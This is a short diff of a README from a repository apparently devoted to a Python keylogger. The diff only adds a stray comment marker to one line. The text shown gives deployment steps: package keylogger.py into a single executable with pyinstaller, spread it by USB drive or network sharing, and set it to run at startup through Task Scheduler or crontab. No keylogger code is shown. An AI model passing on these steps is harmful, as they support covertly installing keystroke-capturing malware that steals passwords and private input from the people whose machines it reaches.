Ahmer-kun/keylogging/README.md

 pyinstaller --onefile keylogger.py

 # Store it on a USB drive or deploy via network sharing.
-# Use task scheduling (Windows Task Scheduler, crontab) to run it at startup.
+# Use task scheduling (Windows Task Scheduler, crontab) to run it at startup.-->